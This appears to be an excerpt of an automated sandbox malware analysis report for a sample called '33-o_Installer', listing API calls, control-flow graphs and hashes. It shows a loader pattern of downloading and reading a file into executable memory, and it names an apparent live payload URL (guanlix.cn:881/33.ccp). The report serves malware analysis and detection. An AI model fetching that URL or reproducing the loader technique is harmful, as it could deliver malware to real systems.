                • Associated: 00000000.00000002.4497624394.0000000000DDF000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4497640647.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_dc0000_33-o_Installer.jbxd
                Similarity
                • API ID: Internet$CloseH_prologHandleOpen$FileRead
                • String ID: Download
                • API String ID: 2208602198-2171396134
                • Opcode ID: be8a706dc78b9816416134b2332d884ef56f06751ccf03720c2441f219723180
                • Instruction ID: c2bbd695f547a0620431b89844843fa98141d1c35b43f46ac1c2a8f0ea67887b
                • Opcode Fuzzy Hash: be8a706dc78b9816416134b2332d884ef56f06751ccf03720c2441f219723180
                • Instruction Fuzzy Hash: 0B21F37590121AEEEF21AB90CC95FFEBB78EB04354F14016EB502B3295DA715E84CE70

                Control-flow Graph

                APIs
                • __EH_prolog.LIBCMT ref: 00DC2E5D
                • InternetOpenA.WININET(Download,00000001,00000000,00000000,00000000), ref: 00DC2E79
                • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,80000000,00000000), ref: 00DC2E96
                • InternetCloseHandle.WININET(?), ref: 00DC2F2A
                  • Part of subcall function 00DC2D2E: __EH_prolog.LIBCMT ref: 00DC2D33
                • InternetReadFile.WININET(?,?,00001000,?), ref: 00DC2EFC
                • InternetCloseHandle.WININET(?), ref: 00DC2F12
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4497588814.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                • Associated: 00000000.00000002.4497574073.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4497608514.0000000000DD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4497624394.0000000000DDF000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4497640647.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_dc0000_33-o_Installer.jbxd
                Similarity
                • API ID: Internet$CloseH_prologHandleOpen$FileRead
                • String ID: Download
                • API String ID: 2208602198-2171396134
                • Opcode ID: b73d67cdc5e13ca5c7980d6f5e627c7ee7c8f0084175812345c8f328378d1b95
                • Instruction ID: e99fa5d96e0642772361c3ef1bfbfcc76fb5529b4b0615e352e9ab1a77fad6a7
                • Opcode Fuzzy Hash: b73d67cdc5e13ca5c7980d6f5e627c7ee7c8f0084175812345c8f328378d1b95
                • Instruction Fuzzy Hash: C411267590121AEFEB11AB94CC85FBEBB7CEB08354F14016EB502B7295C6715E84CA30

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 672 336ffe7-336fffc LoadLibraryA 673 3370004-3370015 672->673 674 336fffe-336ffff 672->674 677 33700c5 673->677 678 337001b-3370026 673->678 675 33700c9-33700cc 674->675 679 33700c7-33700c8 677->679 678->677 680 337002c-337003a VirtualProtect 678->680 679->675 680->677 681 3370040-337007a call 337161e call 33718bb VirtualProtect 680->681 681->677 687 337007c-3370088 681->687 687->677 688 337008a-3370098 VirtualProtect 687->688 688->677 689 337009a-33700c3 call 337161e call 33718bb VirtualProtect 688->689 689->679
                APIs
                • LoadLibraryA.KERNEL32(?,00000000,00000002,?,0336FCB5,00000000), ref: 0336FFF5
                • VirtualProtect.KERNEL32(00000000,0000000C,00000040,?,?,0336FCB5,00000000), ref: 03370035
                • VirtualProtect.KERNEL32(00000000,0000000C,?,?), ref: 03370068
                • VirtualProtect.KERNEL32(00000000,004014A4,00000040,?), ref: 03370093
                • VirtualProtect.KERNEL32(00000000,004014A4,?,?), ref: 033700BD
                Memory Dump Source
                • Source File: 00000000.00000002.4497904003.0000000003360000.00000040.00001000.00020000.00000000.sdmp, Offset: 03360000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3360000_33-o_Installer.jbxd
                Yara matches
                Similarity
                • API ID: ProtectVirtual$LibraryLoad
                • String ID:
                • API String ID: 895956442-0
                • Opcode ID: 37e3d411deaf8316fac3a5409ea6f1d30f4815463f8cd534134295cee1b328aa
                • Instruction ID: da592e09097807176b6af9aeddf418e20c5115b081c648e4d32b234a44c6f0b6
                • Opcode Fuzzy Hash: 37e3d411deaf8316fac3a5409ea6f1d30f4815463f8cd534134295cee1b328aa
                • Instruction Fuzzy Hash: 152195B760130A6FD774DA658CC8EBBB7ECEB84311B04083DBE46D2551EB7CE5058661

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 694 dc297f-dc2991 call dc4948 697 dc2997-dc29a1 694->697 698 dc2993-dc2995 694->698 700 dc29cf-dc29d2 697->700 701 dc29a3-dc29ac 697->701 699 dc29bf-dc29cc 698->699 703 dc29ef-dc29f2 700->703 704 dc29d4-dc29de call dc19a1 700->704 701->700 702 dc29ae-dc29ba 701->702 706 dc29bc 702->706 705 dc29be 703->705 709 dc29f4-dc2a10 call dc252d 704->709 710 dc29e0-dc29e4 call dc1fe5 704->710 705->699 706->705 715 dc2a13-dc2a1a 709->715 714 dc29e9-dc29ed 710->714 714->703 714->706 716 dc2aa7-dc2aaa 715->716 717 dc2a20-dc2a23 715->717 718 dc2a25-dc2a48 716->718 717->718 720 dc2a4a-dc2a4d 718->720 721 dc2ac5 718->721 722 dc2aaf-dc2ab2 720->722 723 dc2a4f-dc2a56 720->723 724 dc2ac8-dc2ad6 call dc1c2d 721->724 722->721 725 dc2ab4-dc2ac3 call dc1fe5 722->725 726 dc2a58 723->726 727 dc2a5b-dc2a60 723->727 724->705 725->721 734 dc2adb-dc2ade 725->734 726->727 731 dc2a81-dc2a8b 727->731 732 dc2a62-dc2a69 727->732 733 dc2a8d-dc2a8f 731->733 731->734 736 dc2a6e-dc2a7f call dc566a 732->736 737 dc2a6b 732->737 733->715 739 dc2a91-dc2a95 733->739 734->724 736->721 736->731 737->736 739->721 741 dc2a97-dc2aa2 call dc2423 739->741 741->715
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4497588814.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                • Associated: 00000000.00000002.4497574073.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4497608514.0000000000DD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4497624394.0000000000DDF000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4497640647.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_dc0000_33-o_Installer.jbxd
                Similarity
                • API ID: Fputc$H_prolog
                • String ID:
                • API String ID: 1896196775-3916222277
                • Opcode ID: bdaf987eb92baa9bad55c814e67242334d8216569f66f1728ea4cae15efbe1bc
                • Instruction ID: 3a7760411be59c5cd85993fcec525793bf59071dddbd8ec2e3487ae8581fe0b1
                • Opcode Fuzzy Hash: bdaf987eb92baa9bad55c814e67242334d8216569f66f1728ea4cae15efbe1bc
                • Instruction Fuzzy Hash: AE41693690160ADBCF25CA98C980FBEB7F5FF59310F24092EE552A7281DB71A944CB70

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 820 33700cd-33700e2 822 33700e4-33700e5 820->822 823 33700ea-33700fb 820->823 824 33701af-33701b2 822->824 826 3370101-337010c 823->826 827 33701ab 823->827 826->827 828 3370112-3370120 VirtualProtect 826->828 829 33701ad-33701ae 827->829 828->827 830 3370126-3370160 call 337161e call 33718bb VirtualProtect 828->830 829->824 830->827 836 3370162-337016e 830->836 836->827 837 3370170-337017e VirtualProtect 836->837 837->827 838 3370180-33701a9 call 337161e call 33718bb VirtualProtect 837->838 838->829
                APIs
                • VirtualProtect.KERNEL32(00000000,000016CC,00000040,?), ref: 0337011B
                • VirtualProtect.KERNEL32(00000000,000016CC,?,?), ref: 0337014E
                • VirtualProtect.KERNEL32(00000000,00402AD1,00000040,?), ref: 03370179
                • VirtualProtect.KERNEL32(00000000,00402AD1,?,?), ref: 033701A3
                Memory Dump Source
                • Source File: 00000000.00000002.4497904003.0000000003360000.00000040.00001000.00020000.00000000.sdmp, Offset: 03360000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3360000_33-o_Installer.jbxd
                Yara matches
                Similarity
                • API ID: ProtectVirtual
                • String ID:
                • API String ID: 544645111-0
                • Opcode ID: 1e70e2575075489d053cc6fb2dca748f7a53306e9098dcd260615f23523f6c56
                • Instruction ID: e1c23d611d779970e9d78c87c987fdb978aaf52bfabcfe340097be7222b55a49
                • Opcode Fuzzy Hash: 1e70e2575075489d053cc6fb2dca748f7a53306e9098dcd260615f23523f6c56
                • Instruction Fuzzy Hash: B52153B66047496FE374DA65CCC8E7BB7ECEB88601B04083DBA87E1551EB78E5058A60

                Control-flow Graph

                APIs
                  • Part of subcall function 00DC1186: __time64.LIBCMT ref: 00DC118E
                  • Part of subcall function 00DC1186: _rand.LIBCMT ref: 00DC119E
                  • Part of subcall function 00DC1186: _rand.LIBCMT ref: 00DC11AD
                • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000004), ref: 00DC2F4E
                  • Part of subcall function 00DC2E58: __EH_prolog.LIBCMT ref: 00DC2E5D
                  • Part of subcall function 00DC2E58: InternetOpenA.WININET(Download,00000001,00000000,00000000,00000000), ref: 00DC2E79
                  • Part of subcall function 00DC2E58: InternetOpenUrlA.WININET(00000000,?,00000000,00000000,80000000,00000000), ref: 00DC2E96
                  • Part of subcall function 00DC2E58: InternetReadFile.WININET(?,?,00001000,?), ref: 00DC2EFC
                  • Part of subcall function 00DC2E58: InternetCloseHandle.WININET(?), ref: 00DC2F12
                  • Part of subcall function 00DC2E58: InternetCloseHandle.WININET(?), ref: 00DC2F2A
                • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00DC2F6F
                  • Part of subcall function 00DC168B: _wprintf.LIBCMT ref: 00DC169D
                  • Part of subcall function 00DC168B: _wprintf.LIBCMT ref: 00DC16B5
                  • Part of subcall function 00DC168B: _wprintf.LIBCMT ref: 00DC16CD
                  • Part of subcall function 00DC168B: _wprintf.LIBCMT ref: 00DC16E5
                  • Part of subcall function 00DC11E1: GetTickCount64.KERNEL32 ref: 00DC11EF
                  • Part of subcall function 00DC11E1: Sleep.KERNEL32(0000012C), ref: 00DC11F9
                  • Part of subcall function 00DC11E1: GetTickCount64.KERNEL32 ref: 00DC11FF
                  • Part of subcall function 00DC11E1: CreateFileA.KERNEL32(C:\Users\Public\Downloads\ind.cod,80000000,00000001,00000000,00000004,00000080,00000000), ref: 00DC1244
                  • Part of subcall function 00DC11E1: GetFileSize.KERNEL32(00000000,00000000), ref: 00DC124E
                  • Part of subcall function 00DC11E1: VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000040), ref: 00DC125F
                  • Part of subcall function 00DC11E1: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00DC1270
                  • Part of subcall function 00DC11E1: CloseHandle.KERNEL32(00000000), ref: 00DC1277
                Strings
                • http://guanlix.cn:881/33.ccp, xrefs: 00DC2F59
                • C:\Users\Public\Downloads\ind.cod, xrefs: 00DC2F54
                Memory Dump Source
                • Source File: 00000000.00000002.4497588814.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                • Associated: 00000000.00000002.4497574073.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4497608514.0000000000DD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4497624394.0000000000DDF000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4497640647.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_dc0000_33-o_Installer.jbxd
                Similarity
                • API ID: Internet$File_wprintf$CloseHandleVirtual$AllocCount64OpenReadTick_rand$CreateFreeH_prologSizeSleep__time64
                • String ID: C:\Users\Public\Downloads\ind.cod$http://guanlix.cn:881/33.ccp
                • API String ID: 2148924518-3625408810
                • Opcode ID: f197c58bd4c41969c7d61b8fb70335c4c2613ebc3074cb111642ca12e65a223a
                • Instruction ID: adb355503a7ccd6221c7b3f0440d827aab5047c7a61e9fc35bca3e4330e40a1f
                • Opcode Fuzzy Hash: f197c58bd4c41969c7d61b8fb70335c4c2613ebc3074cb111642ca12e65a223a
                • Instruction Fuzzy Hash: F8E0C2722C43213AF210B3B0AC0BFAA0208DB01B50F110016F204EA1C3D99618428278

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 852 336fb37-336fb76 call 3371628 * 2 857 336fd91 852->857 858 336fb7c-336fb7e 852->858 860 336fd94-336fd9b 857->860 858->857 859 336fb84-336fb95 VirtualAlloc 858->859 859->857 861 336fb9b-336fbe9 call 33718bb call 33718df call 33717ba call 3371695 859->861 870 336fd3e-336fd4a 861->870 871 336fbef-336fbf5 861->871 872 336fd4c-336fd54 870->872 873 336fd7a-336fd8f call 33718df 870->873 871->870 874 336fbfb-336fc15 call 3371628 871->874 872->873 875 336fd56-336fd73 call 33718df 872->875 873->860 874->857 882 336fc1b-336fc23 874->882 875->873 883 336fc25 882->883 884 336fc3b-336fc41 882->884 886 336fc2b-336fc39 LoadLibraryA 883->886 887 336fc77-336fc82 884->887 888 336fc43-336fc46 884->888 886->884 886->886 891 336fc84-336fc8d call 33701b3 887->891 892 336fc99-336fca2 887->892 890 336fc49-336fc62 call 3371628 888->890 902 336fd3a 890->902 903 336fc68-336fc75 890->903 891->902 906 336fc93 891->906 895 336fca6-336fcad 892->895 896 336fca4 892->896 897 336fcd5-336fcd8 895->897 898 336fcaf-336fcb8 call 336ffe7 895->898 896->895 904 336fd33-336fd34 call 3370eca 897->904 905 336fcda-336fcdd 897->905 911 336fcc2-336fcc3 call 33700cd 898->911 912 336fcba-336fcc0 898->912 902->870 903->887 903->890 910 336fd39 904->910 905->904 908 336fcdf-336fce2 905->908 906->892 913 336fd07-336fd16 call 33709f9 908->913 914 336fce4-336fce6 908->914 910->902 918 336fcc8-336fccb 911->918 912->902 912->911 924 336fd25-336fd31 call 337058d 913->924 925 336fd18-336fd1e call 3370c04 913->925 914->913 917 336fce8-336fceb 914->917 920 336fcff-336fd05 call 3371351 917->920 921 336fced-336fcf0 917->921 918->897 923 336fccd-336fcd3 918->923 920->910 921->920 926 336fcf2-336fcf5 921->926 923->897 923->902 924->910 932 336fd23-336fd24 925->932 926->902 930 336fcf7-336fcfd call 33714e2 926->930 930->910 932->924
                APIs
                • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 0336FB8F
                • LoadLibraryA.KERNEL32(00000238), ref: 0336FC2C
                Memory Dump Source
                • Source File: 00000000.00000002.4497904003.0000000003360000.00000040.00001000.00020000.00000000.sdmp, Offset: 03360000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3360000_33-o_Installer.jbxd
                Yara matches
                Similarity
                • API ID: AllocLibraryLoadVirtual
                • String ID:
                • API String ID: 3550616410-0
                • Opcode ID: 51126b6fd836e9861d18a340eaab34de8d787920e2fff5e274c72b92ada8e67f
                • Instruction ID: 253ffc3e255de220f5abc03bdecf8456c27f539f2c1c6c9647586b13fc25a4fe
                • Opcode Fuzzy Hash: 51126b6fd836e9861d18a340eaab34de8d787920e2fff5e274c72b92ada8e67f
                • Instruction Fuzzy Hash: 6961D076901B02AFCB32EBA4DCC0AABF7E9FF05310F184919E65A49458D739F151CB51

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1122 dc5902-dc591e call dca9b0 1125 dc5935-dc5939 1122->1125 1126 dc5920-dc5933 call dca95f call dca90d 1122->1126 1128 dc5948-dc5954 call dc50e4 call dc5895 1125->1128 1129 dc593b 1125->1129 1135 dc5942-dc5947 call dca9f5 1126->1135 1140 dc5959-dc5969 call dc596e 1128->1140 1132 dc593f 1129->1132 1132->1135 1140->1132
                APIs
                  • Part of subcall function 00DCA95F: __getptd_noexit.LIBCMT ref: 00DCA95F
                • __lock_file.LIBCMT ref: 00DC5949
                  • Part of subcall function 00DC50E4: __lock.LIBCMT ref: 00DC5109
                • __fclose_nolock.LIBCMT ref: 00DC5954
                Memory Dump Source
                • Source File: 00000000.00000002.4497588814.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                • Associated: 00000000.00000002.4497574073.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4497608514.0000000000DD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4497624394.0000000000DDF000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4497640647.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_dc0000_33-o_Installer.jbxd
                Similarity
                • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                • String ID:
                • API String ID: 2800547568-0
                • Opcode ID: 1e8ba5884ef3a6d2e4b09dc408bbc67d0cbb52da015e99d4f9d943402363474d
                • Instruction ID: 1ec6832ee7f251e85d7872fb69e3e246294d356801e62225108633e65e996e49
                • Opcode Fuzzy Hash: 1e8ba5884ef3a6d2e4b09dc408bbc67d0cbb52da015e99d4f9d943402363474d
                • Instruction Fuzzy Hash: CFF06830800B17DADB10AB689802F5E77A09F01334F15824DE4759B0D5CF78A9419E75
                Memory Dump Source
                • Source File: 00000000.00000002.4498846255.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_5830000_33-o_Installer.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 43069cd0759cb82144f3ab254e55e0df7a61f0f373cb16e9f7735dae29a55764
                • Instruction ID: 8d5ffc1428d2c1723f6843dcbdbdf9051332c4a09c10be55d250e27bfd35315c
                • Opcode Fuzzy Hash: 43069cd0759cb82144f3ab254e55e0df7a61f0f373cb16e9f7735dae29a55764
                • Instruction Fuzzy Hash: 1F412371D0435A8FCB04DFB9D8446AEBBF5FF89210F14896AD909E7240EB349884CBD1
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.4497588814.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                • Associated: 00000000.00000002.4497574073.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4497608514.0000000000DD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4497624394.0000000000DDF000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4497640647.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_dc0000_33-o_Installer.jbxd
                Similarity
                • API ID: _memmove
                • String ID:
                • API String ID: 4104443479-0
                • Opcode ID: 7953638f3f25e3a1c1ef1a9b40900645cc6313bdfea29492fdfdc0122a234614
                • Instruction ID: 93b0540c9037f496d652cc1e983eec6ffaccc3a3daeed352522668d37fa4741d
                • Opcode Fuzzy Hash: 7953638f3f25e3a1c1ef1a9b40900645cc6313bdfea29492fdfdc0122a234614
                • Instruction Fuzzy Hash: B931493990462AEFCB50CF59C844A9977B5FF0A364F18826EF82487192D370DE50CFA0
                APIs
                • GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,05837632), ref: 0583771F
                Memory Dump Source
                • Source File: 00000000.00000002.4498846255.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_5830000_33-o_Installer.jbxd
                Similarity
                • API ID: GlobalMemoryStatus
                • String ID:
                • API String ID: 1890195054-0
                • Opcode ID: ef7ae6577eaa83924f9012dc7d9dc8ed5e068d9aecc1a402aa7a49b909480a0f
                • Instruction ID: b34106025863bd516bd715effe21ec5e17c81ab25aad66ccee57248b08fb30d5
                • Opcode Fuzzy Hash: ef7ae6577eaa83924f9012dc7d9dc8ed5e068d9aecc1a402aa7a49b909480a0f
                • Instruction Fuzzy Hash: 872135B1C0425A9FCB00CFAAD445ADEFBF4AF48320F15816AD818A7200D378A944CBE5
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.4497588814.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                • Associated: 00000000.00000002.4497574073.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4497608514.0000000000DD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4497624394.0000000000DDF000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4497640647.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_dc0000_33-o_Installer.jbxd
                Similarity
                • API ID: H_prolog
                • String ID:
                • API String ID: 3519838083-0
                • Opcode ID: f2f1164aa254138a68a143262e79b00b16de3f215bfbf609aad1bb7cfe98bd76
                • Instruction ID: 929c0db59881e5a301fca2139055f68f004948992f240fb1366526c2a6d88c34
                • Opcode Fuzzy Hash: f2f1164aa254138a68a143262e79b00b16de3f215bfbf609aad1bb7cfe98bd76
                • Instruction Fuzzy Hash: 891116B5A10216AFDB24DF98C895EAAFBE9FF54704B14881EF446A7341C7B19D00CBB0
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.4497588814.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                • Associated: 00000000.00000002.4497574073.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4497608514.0000000000DD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4497624394.0000000000DDF000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4497640647.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_dc0000_33-o_Installer.jbxd
                Similarity
                • API ID: H_prolog
                • String ID:
                • API String ID: 3519838083-0
                • Opcode ID: cd1a8a8360c2951ece819dc3cc97b84b4dcb3c7623738e3e522a97fafa2f8cb8
                • Instruction ID: 67fca2e8f20edd7c992c5165dad20e4053b918df1ddb00767b3b11e960153b2a
                • Opcode Fuzzy Hash: cd1a8a8360c2951ece819dc3cc97b84b4dcb3c7623738e3e522a97fafa2f8cb8
                • Instruction Fuzzy Hash: BB1128B5A10216AFDB24DF98C895EAAFBF9FF54304B14881EE446A7341C7B19D00CBB0
                APIs
                • GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,05837632), ref: 0583771F
                Memory Dump Source
                • Source File: 00000000.00000002.4498846255.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_5830000_33-o_Installer.jbxd
                Similarity
                • API ID: GlobalMemoryStatus
                • String ID:
                • API String ID: 1890195054-0
                • Opcode ID: ba2e5da472c72e0ad55a44d026c97dc1840d7c9c0fa02da6c6683ab3a9e8a86c
                • Instruction ID: 7945f306da26114e09129edc45cd56aeb97207c1fa2de8ed71e43d1e0a4df04e
                • Opcode Fuzzy Hash: ba2e5da472c72e0ad55a44d026c97dc1840d7c9c0fa02da6c6683ab3a9e8a86c
                • Instruction Fuzzy Hash: 831108B1C002599FDB10CFAAD4456DEFBF4EF48310F15811AD918A7640D374A954CFE1
                APIs
                • GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,05837632), ref: 0583771F
                Memory Dump Source
                • Source File: 00000000.00000002.4498846255.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_5830000_33-o_Installer.jbxd
                Similarity
                • API ID: GlobalMemoryStatus
                • String ID:
                • API String ID: 1890195054-0
                • Opcode ID: 700b387e8fac9b9604fabb6e21c9596bc60f430e07f88f099b476e5f0c253ec4
                • Instruction ID: abfed9f3868231e0a9506ea63bb02441a6b61c41b7537104100ce77c00cba73c
                • Opcode Fuzzy Hash: 700b387e8fac9b9604fabb6e21c9596bc60f430e07f88f099b476e5f0c253ec4
                • Instruction Fuzzy Hash: 821133B1C0025A9BCB10CFAAC445B9EFBF4EB48320F14812AE918A7240D378A944CFE5
                APIs
                • __EH_prolog.LIBCMT ref: 00DC2488
                  • Part of subcall function 00DC130B: std::locale::facet::_Incref.LIBCPMT ref: 00DC131E
                  • Part of subcall function 00DC235F: __EH_prolog.LIBCMT ref: 00DC2364
                  • Part of subcall function 00DC235F: std::_Lockit::_Lockit.LIBCPMT ref: 00DC2373
                  • Part of subcall function 00DC235F: int.LIBCPMT ref: 00DC238A
                Memory Dump Source
                • Source File: 00000000.00000002.4497588814.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                • Associated: 00000000.00000002.4497574073.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4497608514.0000000000DD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4497624394.0000000000DDF000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4497640647.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_dc0000_33-o_Installer.jbxd
                Similarity
                • API ID: H_prolog$IncrefLockitLockit::_std::_std::locale::facet::_
                • String ID:
                • API String ID: 3551698239-0
                • Opcode ID: 490e9eafea28b7231c9ce6db28adc78f9dfeee47710b6a22a510ec3a2bc9715b
                • Instruction ID: a98b079a346a1d3b9f92ae3ee778aab41ab3806ecaf76151a8181dfa2695308d
                • Opcode Fuzzy Hash: 490e9eafea28b7231c9ce6db28adc78f9dfeee47710b6a22a510ec3a2bc9715b
                • Instruction Fuzzy Hash: 04F06D36640266ABCB19EB64CC02FAE73A9EB25710F04402DF805D3586DBB49A5097B0
                APIs
                • __EH_prolog.LIBCMT ref: 00DC2488
                  • Part of subcall function 00DC130B: std::locale::facet::_Incref.LIBCPMT ref: 00DC131E
                  • Part of subcall function 00DC235F: __EH_prolog.LIBCMT ref: 00DC2364
                  • Part of subcall function 00DC235F: std::_Lockit::_Lockit.LIBCPMT ref: 00DC2373
                  • Part of subcall function 00DC235F: int.LIBCPMT ref: 00DC238A
                Memory Dump Source
                • Source File: 00000000.00000002.4497588814.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                • Associated: 00000000.00000002.4497574073.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4497608514.0000000000DD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4497624394.0000000000DDF000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4497640647.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_dc0000_33-o_Installer.jbxd
                Similarity
                • API ID: H_prolog$IncrefLockitLockit::_std::_std::locale::facet::_
                • String ID:
                • API String ID: 3551698239-0
                • Opcode ID: c03d5ba6c2d0cb42b3adde715832f975592e597920aa5f8b8a63c188a5aff4d8
                • Instruction ID: 8c2efc640e77c5370c5a23ea02b0ba8ce4d1f6109349c98842506862197b15f0
                • Opcode Fuzzy Hash: c03d5ba6c2d0cb42b3adde715832f975592e597920aa5f8b8a63c188a5aff4d8
                • Instruction Fuzzy Hash: D2F06D36600266ABCF19EB54CC02FAE73A9EB25711F04402DF805D3586DBB49A50D7B0
                Memory Dump Source
                • Source File: 00000000.00000002.4498018309.00000000033BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 033BD000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_33bd000_33-o_Installer.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: f466f250705995e97d5677610d803f120d7c87f2f24955584fd6a782c6559b9a
                • Instruction ID: 4e0170dfd45cbaebcc71eea5120643879557819c32dc9fb8eaeea864e524ef9b
                • Opcode Fuzzy Hash: f466f250705995e97d5677610d803f120d7c87f2f24955584fd6a782c6559b9a
                • Instruction Fuzzy Hash: D02167B1604200DFDB04EF14D9C0B66BF79FB98310F68C5A9DA0D0BA06C336D416CBA1
                Memory Dump Source
                • Source File: 00000000.00000002.4498018309.00000000033BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 033BD000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_33bd000_33-o_Installer.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 1fcccb133e5ecb2f390c18e5757edc800b5d3ed9c414959ec0d90718c9fb80e1
                • Instruction ID: 7d0a06a6b71eadb4a890ca368e723ba65b78780fb286cf3b428dbd2a88535190
                • Opcode Fuzzy Hash: 1fcccb133e5ecb2f390c18e5757edc800b5d3ed9c414959ec0d90718c9fb80e1
